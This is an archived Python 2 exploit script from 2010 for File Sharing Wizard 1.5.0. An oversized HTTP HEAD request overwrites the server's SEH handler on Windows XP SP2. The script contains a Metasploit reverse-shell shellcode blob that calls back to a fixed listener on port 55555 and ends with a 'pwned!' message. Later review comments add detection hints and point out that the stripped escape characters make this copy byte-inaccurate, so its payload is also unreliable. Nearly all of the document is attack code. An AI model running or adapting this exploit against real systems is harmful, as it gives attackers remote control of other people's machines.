
# Title : File Sharing Wizard Version 1.5.0 (SEH) Exploit
# Published : 2010-06-17
# Author : b0nd


#!/usr/bin/python


# Banner (Python 2 print statements, as is the rest of this script).
# The stray "n" at the start of the first string is an archival artefact: the
# "\n" escape appears to have lost its backslash, as do the other escapes in
# this file, so the literals print as plain ASCII rather than as the intended
# control characters.
print "n##########################################################"
print "##		Team Hackers Garage			##"
print "##		(www.garage4hackers.com)		##"
print "##							##"
print "##	File Sharing Wizard Version 1.5.0		##"
print "##		Remote Command Execution		##"
print "##       	 	Author: b0nd			##"
print "##		(sumit.iips@gmail.com)			##"
print "##                           				##"
print "##	Greetz to: The Hackers Garage Family		##"
print "##	Thanks to: www.exploit-db.com/author/m1k3/	##"
print "##							##"
print "##			&				##"
print "##							##"
print "##		corelanc0d3r (CORELAN TEAM)		##"
print "##							##"
print "###########################################################"


# http://www.sharing-file.net/
# File Sharing Wizard Version 1.5.0, built on 26-8-2008

# Summary: The "HEAD" command leads to an SEH overwrite and ultimately to remote system compromise
# Tested on: Windows XP SP2
# SEH overwrite; at the crash the shellcode is pointed to by EBP
# Huge space for shellcode.


import socket
import sys

# Argument handling.
# NOTE(review): the guard tests for fewer than 2 argv entries, but sys.argv[2]
# is read a few lines below, so a run with only one argument fails with an
# IndexError instead of printing this usage text.
if len(sys.argv) < 2:
	print "Usage: exploit-code.py <Remote-IP-Address> <Remote-Port>"
	sys.exit(1)

ips = sys.argv[1]	# target host (used verbatim; no validation)
port = int(sys.argv[2])	# target TCP port; a non-numeric value raises ValueError here


# Overflow buffer, laid out as the author's comments describe: filler, then the
# SEH record (nSEH followed by the handler address), NOPs, shellcode, trailing junk.
# NOTE(review): throughout this archived copy the "\x.." escapes appear with the
# backslash stripped ("x90" rather than the single-byte form), so as printed here
# every such literal is plain ASCII text and several times longer than the byte
# counts the comments imply. This page is not a byte-accurate copy of the script.
string = "A"*1040
string += "x90x90x1dxeb"	# nSEH: per the author, a short jump forward into the shellcode
string += "x29xE3xD3x74"	# SEH handler: per the author, a pop/pop/ret in oledlg.dll (not SafeSEH-protected); this hard-codes the module layout of the tested Windows XP SP2 build
string += "x90"*16		# NOP sled between the SEH record and the shellcode

# Shellcode, per the generator line below: Metasploit win32_reverse, a
# reverse-connect payload with the call-back address and port (192.168.96.1:55555)
# fixed at generation time, PexAlphaNum-encoded (the 0x41-0x5a byte range is why
# the blob reads as upper-case letters). The blob is opaque; the author's own
# "don't trust the shellcode" remark applies to any payload taken from a third
# party. From the defender's side, the observable is the outbound TCP connection
# from the server to that call-back port.
#win32_reverse -  EXITFUNC=seh LHOST=192.168.96.1 LPORT=55555 Size=649 Encoder=PexAlphaNum http://metasploit.com */
#Thumb rule - Don't trust the shellcode ;)
string += ("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" +
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" +
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" +
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" +
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e" +
"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38" +
"x4ex56x46x42x46x32x4bx48x45x44x4ex43x4bx38x4ex47" +
"x45x30x4ax37x41x50x4fx4ex4bx38x4fx44x4ax31x4bx48" +
"x4fx35x42x32x41x50x4bx4ex49x44x4bx38x46x53x4bx38" +
"x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x38x42x4c" +
"x46x57x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e" +
"x46x4fx4bx53x46x45x46x42x4ax32x45x47x45x4ex4bx38" +
"x4fx35x46x32x41x50x4bx4ex48x46x4bx58x4ex50x4bx34" +
"x4bx58x4fx55x4ex41x41x30x4bx4ex43x30x4ex32x4bx48" +
"x49x48x4ex56x46x42x4ex31x41x36x43x4cx41x53x4bx4d" +
"x46x46x4bx58x43x54x42x53x4bx48x42x54x4ex50x4bx48" +
"x42x47x4ex41x4dx4ax4bx38x42x54x4ax30x50x55x4ax36" +
"x50x58x50x54x50x50x4ex4ex42x45x4fx4fx48x4dx48x36" +
"x43x45x48x36x4ax36x43x43x44x53x4ax36x47x57x43x57" +
"x44x53x4fx35x46x35x4fx4fx42x4dx4ax56x4bx4cx4dx4e" +
"x4ex4fx4bx43x42x35x4fx4fx48x4dx4fx45x49x58x45x4e" +
"x48x56x41x38x4dx4ex4ax30x44x30x45x55x4cx36x44x50" +
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55" +
"x4fx4fx48x4dx43x55x43x55x43x55x43x55x43x44x43x55" +
"x43x44x43x45x4fx4fx42x4dx4ax56x42x4cx4ax4ax42x56" +
"x41x50x48x56x4ax36x49x4dx43x50x48x36x43x45x49x38" +
"x41x4ex45x59x4ax46x4ex4ex49x4fx4cx4ax42x56x47x35" +
"x4fx4fx48x4dx4cx56x42x41x41x55x45x35x4fx4fx42x4d" +
"x48x56x4cx46x46x36x48x36x4ax46x43x36x4dx56x4cx46" +
"x42x55x49x35x49x52x4ex4cx49x58x47x4ex4cx36x46x54" +
"x49x58x44x4ex41x33x42x4cx43x4fx4cx4ax45x39x49x48" +
"x4dx4fx50x4fx44x44x4dx42x50x4fx44x44x4ex52x4dx48" +
"x4cx47x4ax33x4bx4ax4bx4ax4bx4ax4ax36x44x57x50x4f" +
"x43x4bx48x41x4fx4fx45x57x4ax42x4fx4fx48x4dx4bx55" +
"x47x45x44x35x41x55x41x55x41x35x4cx46x41x30x41x45" +
"x41x35x45x35x41x55x4fx4fx42x4dx4ax56x4dx4ax49x4d" +
"x45x50x50x4cx43x55x4fx4fx48x4dx4cx56x4fx4fx4fx4f" +
"x47x53x4fx4fx42x4dx4ax56x47x4ex49x57x48x4cx49x47" +
"x4fx4fx45x57x46x50x4fx4fx48x4dx4fx4fx47x47x4ex4f" +
"x4fx4fx42x4dx4ax56x42x4fx4cx48x46x30x4fx35x43x45" +
"x4fx4fx48x4dx4fx4fx42x4dx5a");

string += "D"*4000 # 4000 bytes of trailing filler (author: "some more junk")

# Status output only; nothing has been sent yet.
print "Launching remote BoF on", ips
print ""

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
	connect=s.connect((ips, port))	# connect() returns None; `connect` is never read
except:
	# NOTE(review): a bare except also catches SystemExit and KeyboardInterrupt,
	# and the original error is discarded, so a refused port and a name-resolution
	# failure are reported identically.
	print "no connection possible"
	sys.exit(1)

# "rn" here (and in the request below) is "\r\n" with the backslashes lost in archiving.
print "rnsending payload"
print "..."

# The request: an HTTP HEAD whose request-target is the entire overflow buffer.
# Per the author's summary, the server's handling of this line overwrites the
# SEH record. Going by the sizes above (1040 + 4 + 4 + 16 + 649 + 4000 bytes
# plus the request framing) the intended request is roughly 5.7 KB; a HEAD
# request line of that length is the thing to alert on in front of this service.
payload = (
'HEAD %s HTTP/1.0rn'
'rn') % (string)


s.send(payload)	# single send of the whole request; no response is read
s.close()

# Unconditional "success" output: the script has no way to tell whether the
# overflow worked. The only real signal is a reverse connection arriving on
# the port fixed in the shellcode generator line (55555).
print "Check your netcat listening on TCP port 55555 for reverse connect shelln"
print "%s pwned!" % (ips)